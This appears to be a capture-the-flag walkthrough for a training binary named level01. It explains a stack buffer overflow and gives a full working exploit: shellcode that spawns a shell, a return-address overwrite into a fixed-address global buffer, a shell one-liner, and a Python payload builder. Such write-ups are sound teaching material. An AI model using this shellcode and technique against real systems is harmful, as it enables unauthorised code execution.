# Level01
Using Ghidra, we can decompile the binary and see that it fills a global buffer of 100 bytes using `fgets()`.

This buffer is then passed to a comparison function that returns false (zero) when the input equals `"dat_wil"`, which lets us reach the second part of the code.

Now comes the real part. There is a second `fgets()` on another buffer, a local (stack) buffer this time. The difference is that this buffer is unprotected: overflowing the first, global buffer somehow never crashes the program (it lives in the data segment, not on the stack), whereas overflowing the local buffer lets us overwrite the saved return address and set `eip` to whatever value we want.

To exploit this vulnerability, we are going to use both buffers.

First, we write `"dat_wil"` into the first `fgets()` so that we reach the rest of the code. Second, we append our shellcode to that same buffer, right after `"dat_wil"` (the check still passes with the shellcode appended, so only the first seven bytes matter to it). Finally, we overflow the second buffer through its `fgets()` call and write the address of the first buffer (+7 bytes, to skip the `"dat_wil"` string at its start) over the saved return address, so that `eip` lands on the shellcode. Because the first buffer is a global in a 32-bit non-PIE binary, its address is fixed, which is what makes this reliable.

To find the offset between the start of the local buffer and the saved return address, we use [this tool](https://wiremask.eu/tools/buffer-overflow-pattern-generator/): we feed the program a non-repeating pattern, it segfaults when `eip` is overwritten, and the 4-byte value found in `eip` at the crash tells us the offset.
Let's build our exploit in 4 parts:

- `"dat_wil"` => the string required to reach the 2nd call to `fgets()`

- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the shellcode: 25 bytes, an `execve("//bin/sh", NULL, NULL)` via `int 0x80` on 32-bit Linux, with no NUL or newline byte in it

Then a `"\n"` to terminate the first `fgets()` read.

- `"A"*80` => padding from the start of the local buffer up to the saved return address (the offset found above)

- `"\x47\xa0\x04\x08"` => the address of our shellcode, `0x0804a047` in little-endian (addr of `a_user_name` + 7), which overwrites the saved `eip`

Then a `"\n"` to terminate the second `fgets()` read.
Here is the full exploit (Python 2 `print` syntax; the trailing `cat` keeps stdin open so the spawned shell can read our commands instead of exiting on EOF):

`(python -c 'print "dat_wil" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "\n" + "A"*80 + "\x47\xa0\x04\x08" + "\n"'; cat) | ./level01`
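As an added example (not part of the original writeup and not the level's own source), here is the same payload built in Python 3 with `struct.pack`, together with a local implementation of the cyclic-pattern offset search that the online tool performs. It assumes the address of `a_user_name` is `0x0804a040` (derived from the writeup's `0x0804a047` minus 7), the 100-byte global buffer size from the Ghidra decompilation, and a constructed crash value for the `eip` lookup; the `fgets()` sizes are not known, so the builder only checks that the first line fits and that neither line contains a newline that would end a read early.

```python
import struct

# Constructed from the writeup above; nothing here is the level's own source.
TRIGGER = b"dat_wil"
GLOBAL_BUF_SIZE = 100            # size of a_user_name, as found in Ghidra
# execve("//bin/sh", NULL, NULL) for 32-bit Linux, the same bytes as in the writeup
SHELLCODE = (
    b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"      # xor eax,eax / ebx / ecx / edx
    b"\x50"                                  # push eax  (NUL terminator)
    b"\x68\x6e\x2f\x73\x68"                  # push "n/sh"
    b"\x68\x2f\x2f\x62\x69"                  # push "//bi"
    b"\x89\xe3"                              # mov ebx, esp  -> "//bin/sh"
    b"\xb0\x0b"                              # mov al, 11    (execve)
    b"\xcd\x80"                              # int 0x80
)
# Assumed: address of a_user_name, derived from the writeup's 0x0804a047 - 7.
A_USER_NAME_ADDR = 0x0804A040


def cyclic_pattern(length):
    """Metasploit/wiremask-style pattern Aa0Aa1Aa2... (every 4-byte window is unique)."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern exhausted")


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that landed in eip (read as little-endian), or -1."""
    return pattern.find(struct.pack("<I", eip_value & 0xFFFFFFFF))


def build_payload(offset, shellcode=SHELLCODE, base=A_USER_NAME_ADDR):
    """Two fgets() lines: "dat_wil"+shellcode, then padding + address of the shellcode."""
    first_line = TRIGGER + shellcode
    if len(first_line) >= GLOBAL_BUF_SIZE:
        raise ValueError("trigger + shellcode must fit in the global buffer")
    ret_addr = base + len(TRIGGER)             # skip "dat_wil", land on the shellcode
    second_line = b"A" * offset + struct.pack("<I", ret_addr)
    for part in (first_line, second_line):
        if b"\n" in part:
            raise ValueError("a newline inside a line would end fgets() early")
    return first_line + b"\n" + second_line + b"\n"


if __name__ == "__main__":
    import sys
    crash_input = cyclic_pattern(200)
    # Constructed example: the crash reported eip = 0x37634136 ("6Ac7"), i.e. offset 80
    off = pattern_offset(crash_input, 0x37634136)
    sys.stdout.buffer.write(build_payload(off))
```

Run it as `(python3 exploit.py; cat) | ./level01`, exactly like the one-liner above; `cat` keeps stdin open for the shell. Computing the offset from the crash value locally, rather than pasting it into the web tool, also makes it easy to re-check the payload whenever the padding or address changes.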